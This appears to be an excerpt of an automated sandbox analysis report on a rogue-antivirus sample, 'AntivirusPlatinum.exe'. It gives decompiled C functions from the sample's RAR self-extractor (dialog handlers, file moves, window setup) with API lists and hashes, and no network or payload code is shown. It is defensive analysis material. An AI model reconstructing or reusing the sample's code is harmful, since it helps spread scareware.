                                                                                                                                                  					 *0x41f324 = _t27;
                                                                                                                                                  					_push(_t27);
                                                                                                                                                  					L12:
                                                                                                                                                  					SetDlgItemTextA(_t26, 0x65, ??);
                                                                                                                                                  					L13:
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t9 != 1) {
                                                                                                                                                  					L5:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t16 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t16 == 0) {
                                                                                                                                                  					GetDlgItemTextA(_t26, 0x65,  *0x41f324, 0x400);
                                                                                                                                                  					_push(1);
                                                                                                                                                  					L9:
                                                                                                                                                  					EndDialog(_t26, ??);
                                                                                                                                                  					goto L13;
                                                                                                                                                  				}
                                                                                                                                                  				_t19 = _t16 - 1;
                                                                                                                                                  				if(_t19 == 0) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  					goto L9;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t19 == 0x64) {
                                                                                                                                                  					_t21 = E004073DB( *0x41f324);
                                                                                                                                                  					if(E00402854(_t26, E004098F7(0x7b),  *0x41f324, _t21, 0) == 0) {
                                                                                                                                                  						goto L13;
                                                                                                                                                  					}
                                                                                                                                                  					_push( *0x41f324);
                                                                                                                                                  					goto L12;
                                                                                                                                                  				}
                                                                                                                                                  				goto L5;
                                                                                                                                                  			}









                                                                                                                                                  0x0040b3de
                                                                                                                                                  0x0040b3e2
                                                                                                                                                  0x0040b3f6
                                                                                                                                                  0x0040b3fe
                                                                                                                                                  0x0040b403
                                                                                                                                                  0x0040b46c
                                                                                                                                                  0x0040b472
                                                                                                                                                  0x0040b473
                                                                                                                                                  0x0040b476
                                                                                                                                                  0x0040b47c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b47e
                                                                                                                                                  0x0040b406
                                                                                                                                                  0x0040b417
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b417
                                                                                                                                                  0x0040b40c
                                                                                                                                                  0x0040b40d
                                                                                                                                                  0x0040b462
                                                                                                                                                  0x0040b468
                                                                                                                                                  0x0040b44b
                                                                                                                                                  0x0040b44c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b44c
                                                                                                                                                  0x0040b40f
                                                                                                                                                  0x0040b410
                                                                                                                                                  0x0040b449
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b449
                                                                                                                                                  0x0040b415
                                                                                                                                                  0x0040b423
                                                                                                                                                  0x0040b43f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b441
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b441
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemText$Dialog
                                                                                                                                                  • String ID: ASKNEXTVOL
                                                                                                                                                  • API String ID: 1770891597-3402441367
                                                                                                                                                  • Opcode ID: 2885259856bbc6aa6553a756ccb99f7839e3b2c9107fb590f79719ba2a1ce419
                                                                                                                                                  • Instruction ID: ec2075d0238c7e63290f5753f8087d9ea159937018a848bc657c4fc681144771
                                                                                                                                                  • Opcode Fuzzy Hash: 2885259856bbc6aa6553a756ccb99f7839e3b2c9107fb590f79719ba2a1ce419
                                                                                                                                                  • Instruction Fuzzy Hash: E1118631144105BAD7116F619D09FBB3B78DB45B05F008036FB11B51D3C7B99922E7AD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  APIs
                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 004027E5
                                                                                                                                                  • SHBrowseForFolderA.SHELL32(?,?), ref: 00402820
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BrowseFolderMalloc
                                                                                                                                                  • String ID: A
                                                                                                                                                  • API String ID: 3812826013-3554254475
                                                                                                                                                  • Opcode ID: e084dcdc2e68c703b4ff934256cf9c76efc63f7733db7aac15ed6670e094de69
                                                                                                                                                  • Instruction ID: 12db1c29d20bd6851e06055d48ea0fd08f2e62197319b2c166d741977c5f3b3f
                                                                                                                                                  • Opcode Fuzzy Hash: e084dcdc2e68c703b4ff934256cf9c76efc63f7733db7aac15ed6670e094de69
                                                                                                                                                  • Instruction Fuzzy Hash: 8F012D76900219AFCF00DFA4C909BEF7BF8AF49311F104566E905E7284D778DA15DBA4
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                  			E0040B213(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                  				void* _t10;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				void* _t21;
                                                                                                                                                  				struct HWND__* _t22;
                                                                                                                                                  
                                                                                                                                                  				_t22 = _a4;
                                                                                                                                                  				E0040309D(_t21, _t22, _a8, _a12, _a16, "GETPASSWORD1", 0, 0);
                                                                                                                                                  				_t10 = _a8 - 0x110;
                                                                                                                                                  				if(_t10 == 0) {
                                                                                                                                                  					SetDlgItemTextA(_t22, 0x66, _a16);
                                                                                                                                                  					L9:
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t10 != 1) {
                                                                                                                                                  					L4:
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                  				if(_t17 == 0) {
                                                                                                                                                  					GetDlgItemTextA(_t22, 0x65, 0x419ee8, 0x80);
                                                                                                                                                  					_push(1);
                                                                                                                                                  					L6:
                                                                                                                                                  					EndDialog(_t22, ??);
                                                                                                                                                  					goto L9;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t17 == 1) {
                                                                                                                                                  					_push(0);
                                                                                                                                                  					goto L6;
                                                                                                                                                  				}
                                                                                                                                                  				goto L4;
                                                                                                                                                  			}







                                                                                                                                                  0x0040b217
                                                                                                                                                  0x0040b22d
                                                                                                                                                  0x0040b235
                                                                                                                                                  0x0040b23a
                                                                                                                                                  0x0040b275
                                                                                                                                                  0x0040b27b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b27d
                                                                                                                                                  0x0040b23d
                                                                                                                                                  0x0040b249
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b249
                                                                                                                                                  0x0040b243
                                                                                                                                                  0x0040b244
                                                                                                                                                  0x0040b265
                                                                                                                                                  0x0040b26b
                                                                                                                                                  0x0040b24f
                                                                                                                                                  0x0040b250
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b250
                                                                                                                                                  0x0040b247
                                                                                                                                                  0x0040b24d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b24d
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemText$Dialog
                                                                                                                                                  • String ID: GETPASSWORD1
                                                                                                                                                  • API String ID: 1770891597-3292211884
                                                                                                                                                  • Opcode ID: 38ceb6cca60ef45e2ce167e0e55ab463e83bc24fa6cd716c630ca3444178103c
                                                                                                                                                  • Instruction ID: 3f68c6a8021282f0a6222af1267fc3a11be894f7b34df5c1b4352459bfe538a6
                                                                                                                                                  • Opcode Fuzzy Hash: 38ceb6cca60ef45e2ce167e0e55ab463e83bc24fa6cd716c630ca3444178103c
                                                                                                                                                  • Instruction Fuzzy Hash: 71F04431284619BADB119FA09D0DFEF3614EB15741F108466F701F90D0C7F9996197AE
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E00403304(void* __ecx, intOrPtr _a4) {
                                                                                                                                                  				char _v1284;
                                                                                                                                                  				long _t11;
                                                                                                                                                  				int _t14;
                                                                                                                                                  				signed int _t16;
                                                                                                                                                  				void* _t19;
                                                                                                                                                  
                                                                                                                                                  				_t19 = __ecx;
                                                                                                                                                  				if( *((char*)(__ecx + 9)) != 0) {
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  				_push(_t16);
                                                                                                                                                  				E0040A610(_t19,  &_v1284, E004098F7(0x74), _a4);
                                                                                                                                                  				_t11 = GetLastError();
                                                                                                                                                  				_t14 = MessageBoxA( *0x419f7c,  &_v1284, E004098F7(0x7e), 0x35);
                                                                                                                                                  				SetLastError(_t11);
                                                                                                                                                  				return _t16 & 0xffffff00 | _t14 == 0x00000004;
                                                                                                                                                  			}








                                                                                                                                                  0x00403304
                                                                                                                                                  0x00403311
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00403367
                                                                                                                                                  0x00403313
                                                                                                                                                  0x00403327
                                                                                                                                                  0x0040332f
                                                                                                                                                  0x0040334e
                                                                                                                                                  0x0040335b
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004098F7: LoadStringA.USER32 ref: 00409946
                                                                                                                                                    • Part of subcall function 004098F7: LoadStringA.USER32 ref: 00409958
                                                                                                                                                    • Part of subcall function 0040A610: wvsprintfA.USER32 ref: 0040A623
                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,766DFC30), ref: 0040332F
                                                                                                                                                  • MessageBoxA.USER32 ref: 0040334E
                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 0040335B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLoadString$Messagewvsprintf
                                                                                                                                                  • String ID: @Mhv
                                                                                                                                                  • API String ID: 2448956881-3595611156
                                                                                                                                                  • Opcode ID: 6199241e6fc427bf97e739a65956078f114f778fcc9a0cd814de5ef21617e504
                                                                                                                                                  • Instruction ID: 9b0c481d7f7e67f7f229bb50c7006102ad22c2c40eeed3713c5a6189838f5978
                                                                                                                                                  • Opcode Fuzzy Hash: 6199241e6fc427bf97e739a65956078f114f778fcc9a0cd814de5ef21617e504
                                                                                                                                                  • Instruction Fuzzy Hash: 64F024328002047AEB103B70AC4DBDB3BACAB01349F04D072F245E61E1EAB989648B64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406CED(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                  				struct _WNDCLASSEXA _v52;
                                                                                                                                                  				short _t17;
                                                                                                                                                  				intOrPtr* _t18;
                                                                                                                                                  				intOrPtr _t21;
                                                                                                                                                  
                                                                                                                                                  				_t21 = _a4;
                                                                                                                                                  				_t18 = __ecx;
                                                                                                                                                  				_v52.cbSize = 0x30;
                                                                                                                                                  				_v52.style = 0x828;
                                                                                                                                                  				_v52.lpfnWndProc = E00406C6F;
                                                                                                                                                  				_v52.cbClsExtra = 0;
                                                                                                                                                  				_v52.cbWndExtra = 0;
                                                                                                                                                  				_v52.hInstance = _t21;
                                                                                                                                                  				_v52.hIcon = 0;
                                                                                                                                                  				_v52.hCursor = LoadCursorA(0, 0x7f00);
                                                                                                                                                  				_v52.hbrBackground = 6;
                                                                                                                                                  				_v52.lpszMenuName = 0;
                                                                                                                                                  				_v52.lpszClassName = "RarHtmlClassName";
                                                                                                                                                  				_v52.hIconSm = 0;
                                                                                                                                                  				_t17 = RegisterClassExA( &_v52);
                                                                                                                                                  				 *_t18 = _t21;
                                                                                                                                                  				return _t17;
                                                                                                                                                  			}







                                                                                                                                                  0x00406cf5
                                                                                                                                                  0x00406d01
                                                                                                                                                  0x00406d03
                                                                                                                                                  0x00406d0a
                                                                                                                                                  0x00406d11
                                                                                                                                                  0x00406d18
                                                                                                                                                  0x00406d1b
                                                                                                                                                  0x00406d1e
                                                                                                                                                  0x00406d21
                                                                                                                                                  0x00406d2a
                                                                                                                                                  0x00406d31
                                                                                                                                                  0x00406d38
                                                                                                                                                  0x00406d3b
                                                                                                                                                  0x00406d42
                                                                                                                                                  0x00406d45
                                                                                                                                                  0x00406d4c
                                                                                                                                                  0x00406d51

                                                                                                                                                  APIs
                                                                                                                                                  • LoadCursorA.USER32 ref: 00406D24
                                                                                                                                                  • RegisterClassExA.USER32(00000030), ref: 00406D45
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ClassCursorLoadRegister
                                                                                                                                                  • String ID: 0$RarHtmlClassName
                                                                                                                                                  • API String ID: 1693014935-3342523147
                                                                                                                                                  • Opcode ID: b12bf7c0c9965d7db7596dfc66fcbb35501a819052bd8b0df238785525de2599
                                                                                                                                                  • Instruction ID: b63988667752bf0d1750ea4bc76319caf74b36bbe64378bd257d001b5d573ad9
                                                                                                                                                  • Opcode Fuzzy Hash: b12bf7c0c9965d7db7596dfc66fcbb35501a819052bd8b0df238785525de2599
                                                                                                                                                  • Instruction Fuzzy Hash: BAF0B6B1D01218ABDB019F99D9889DEFBF8FF59704F10805BE510B7250C7B856158FA9
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                  			E0040ACA1(signed int _a4) {
                                                                                                                                                  				signed int _t4;
                                                                                                                                                  				signed int _t10;
                                                                                                                                                  				struct HDC__* _t13;
                                                                                                                                                  
                                                                                                                                                  				if( *0x41f318 == 0) {
                                                                                                                                                  					_t13 = GetDC(0);
                                                                                                                                                  					if(_t13 != 0) {
                                                                                                                                                  						 *0x41f318 = GetDeviceCaps(_t13, 0x58);
                                                                                                                                                  						ReleaseDC(0, _t13);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t4 =  *0x41f318; // 0x60
                                                                                                                                                  				asm("cdq");
                                                                                                                                                  				_t10 = 0x60;
                                                                                                                                                  				return _t4 * _a4 / _t10;
                                                                                                                                                  			}






                                                                                                                                                  0x0040aca8
                                                                                                                                                  0x0040acb3
                                                                                                                                                  0x0040acb7
                                                                                                                                                  0x0040acc5
                                                                                                                                                  0x0040acca
                                                                                                                                                  0x0040acca
                                                                                                                                                  0x0040acd0
                                                                                                                                                  0x0040acd1
                                                                                                                                                  0x0040acdd
                                                                                                                                                  0x0040acde
                                                                                                                                                  0x0040ace1

                                                                                                                                                  APIs
                                                                                                                                                  • GetDC.USER32(00000000), ref: 0040ACAD
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0040ACBC
                                                                                                                                                  • ReleaseDC.USER32 ref: 0040ACCA
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe, xrefs: 0040ACAA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CapsDeviceRelease
                                                                                                                                                  • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe
                                                                                                                                                  • API String ID: 127614599-249117747
                                                                                                                                                  • Opcode ID: 23e503250e671d4b5bf7f771171e596611eb0c5dc39ab2f57af2eff24b2b2b41
                                                                                                                                                  • Instruction ID: 4be5ef56d5da3d017a27d9bd15ee070ca2e7f4ed1232f0d4ef002000c82c220f
                                                                                                                                                  • Opcode Fuzzy Hash: 23e503250e671d4b5bf7f771171e596611eb0c5dc39ab2f57af2eff24b2b2b41
                                                                                                                                                  • Instruction Fuzzy Hash: 40E01A32545714ABE310DB14AE49B877A64AB15B12F018136FB05AA1E0C7B48464ABDD
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                  			E00404B4F(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                  				char _v1028;
                                                                                                                                                  				char _v2052;
                                                                                                                                                  				char _v5156;
                                                                                                                                                  				char _v6212;
                                                                                                                                                  				char _v9412;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				int _t57;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				void* _t80;
                                                                                                                                                  
                                                                                                                                                  				E00401200(0x24c0);
                                                                                                                                                  				_t70 =  &_v9412;
                                                                                                                                                  				E00403556( &_v9412);
                                                                                                                                                  				_t77 = _a4;
                                                                                                                                                  				_t68 = 0;
                                                                                                                                                  				_push(0);
                                                                                                                                                  				if(E00406045( &_v9412, __edx, _a4, _a8,  &_v9412) == 0 || _v9412 == 0 || _v6212 == 0 || E0040DA54(E004073DB( &_v9412),  &_v6212) == 0) {
                                                                                                                                                  					L15:
                                                                                                                                                  					__eflags = 0;
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t38 = E0040DA54(E004073DB(_t77),  &_v6212);
                                                                                                                                                  					_t86 = _t38;
                                                                                                                                                  					if(_t38 != 0) {
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					while(1) {
                                                                                                                                                  						E0040DB30( &_v1028, _t77, 0x400);
                                                                                                                                                  						E0040A610(_t70, E004073DB( &_v1028), "rtmp%d", _t68);
                                                                                                                                                  						_t80 = _t80 + 0xc;
                                                                                                                                                  						if(E00405767(_t86,  &_v1028, 0) == 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_t68 = _t68 + 0x7b;
                                                                                                                                                  						_t88 = _t68 - 0x2710;
                                                                                                                                                  						if(_t68 < 0x2710) {
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  						break;
                                                                                                                                                  					}
                                                                                                                                                  					if(E00405767(_t88,  &_v1028, 0) != 0) {
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					E0040DB30( &_v2052, _t77, 0x400);
                                                                                                                                                  					_t51 = E004073DB( &_v9412);
                                                                                                                                                  					E0040A477(E004073DB( &_v2052), _t51);
                                                                                                                                                  					_t57 = MoveFileA( &_v2052,  &_v1028);
                                                                                                                                                  					_t90 = _t57;
                                                                                                                                                  					if(_t57 == 0) {
                                                                                                                                                  						goto L15;
                                                                                                                                                  					}
                                                                                                                                                  					E00404EC3( &_v5156);
                                                                                                                                                  					_t69 = 0;
                                                                                                                                                  					if(E00405767(_t90, _t77, 0) == 0) {
                                                                                                                                                  						_t69 = E004051D8( &_v5156, _t77, 0, 1);
                                                                                                                                                  					}
                                                                                                                                                  					MoveFileA( &_v1028,  &_v2052);
                                                                                                                                                  					if(_t69 != 0) {
                                                                                                                                                  						E00404F2E( &_v5156);
                                                                                                                                                  						E00404FAC( &_v5156);
                                                                                                                                                  					}
                                                                                                                                                  					E00405074(_t69,  &_v5156);
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  			}















                                                                                                                                                  0x00404b57
                                                                                                                                                  0x00404b5f
                                                                                                                                                  0x00404b65
                                                                                                                                                  0x00404b6a
                                                                                                                                                  0x00404b6d
                                                                                                                                                  0x00404b6f
                                                                                                                                                  0x00404b82
                                                                                                                                                  0x00404ce8
                                                                                                                                                  0x00404ce8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404bc1
                                                                                                                                                  0x00404bcf
                                                                                                                                                  0x00404bd4
                                                                                                                                                  0x00404bd6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404be1
                                                                                                                                                  0x00404bea
                                                                                                                                                  0x00404c02
                                                                                                                                                  0x00404c07
                                                                                                                                                  0x00404c1a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404c1c
                                                                                                                                                  0x00404c1f
                                                                                                                                                  0x00404c25
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404c25
                                                                                                                                                  0x00404c37
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404c46
                                                                                                                                                  0x00404c52
                                                                                                                                                  0x00404c65
                                                                                                                                                  0x00404c7e
                                                                                                                                                  0x00404c80
                                                                                                                                                  0x00404c82
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404c8a
                                                                                                                                                  0x00404c92
                                                                                                                                                  0x00404c9b
                                                                                                                                                  0x00404cad
                                                                                                                                                  0x00404cad
                                                                                                                                                  0x00404cbd
                                                                                                                                                  0x00404cc1
                                                                                                                                                  0x00404cc9
                                                                                                                                                  0x00404cd4
                                                                                                                                                  0x00404cd4
                                                                                                                                                  0x00404cdf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00404ce4

                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 0040DA54: CompareStringA.KERNEL32(00000400,00001001,0040BAA2,000000FF,?,000000FF,0040BAA2,?,STATIC), ref: 0040DA6A
                                                                                                                                                    • Part of subcall function 0040A610: wvsprintfA.USER32 ref: 0040A623
                                                                                                                                                    • Part of subcall function 00405767: GetFileAttributesW.KERNEL32(?,00404D18,00000045,?,?,?,?), ref: 0040577F
                                                                                                                                                  • MoveFileA.KERNEL32 ref: 00404C7E
                                                                                                                                                  • MoveFileA.KERNEL32 ref: 00404CBD
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Move$AttributesCompareStringwvsprintf
                                                                                                                                                  • String ID: rtmp%d
                                                                                                                                                  • API String ID: 1782884900-3303766350
                                                                                                                                                  • Opcode ID: d76d8e228970df82160ae1bd043e0aa0810584178d57b14355410fbc6a8d3338
                                                                                                                                                  • Instruction ID: 2635e19358c8d7c776646382d2ab8edccefdc26a919b6fac259dc95f7fea154b
                                                                                                                                                  • Opcode Fuzzy Hash: d76d8e228970df82160ae1bd043e0aa0810584178d57b14355410fbc6a8d3338
                                                                                                                                                  • Instruction Fuzzy Hash: 744122B680521865DF20F6A29C45FEB737CAF45348F0504BBBA04B7191DA78AB498F78
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 60%
                                                                                                                                                  			E00403785(void* __edx, void* __eflags, intOrPtr _a4, CHAR* _a8, WCHAR* _a12) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				void* _t13;
                                                                                                                                                  				int _t15;
                                                                                                                                                  				void* _t17;
                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                  
                                                                                                                                                  				_t13 = E00406EA5();
                                                                                                                                                  				if(_t13 == 0) {
                                                                                                                                                  					return _t13;
                                                                                                                                                  				}
                                                                                                                                                  				_t29 = _a4;
                                                                                                                                                  				_v16 = 0;
                                                                                                                                                  				_v12 = 0;
                                                                                                                                                  				_v8 = 0;
                                                                                                                                                  				_t15 = E00402511(_a4, __edx,  &_v16, 0);
                                                                                                                                                  				if(_t15 != 0) {
                                                                                                                                                  					E004034AA();
                                                                                                                                                  					_t17 = 7;
                                                                                                                                                  					_t38 =  *0x41486d; // 0x0
                                                                                                                                                  					if(_t38 != 0) {
                                                                                                                                                  						_t17 = 0xf;
                                                                                                                                                  					}
                                                                                                                                                  					_push(_v16);
                                                                                                                                                  					_push(_t17);
                                                                                                                                                  					if(_a12 == 0) {
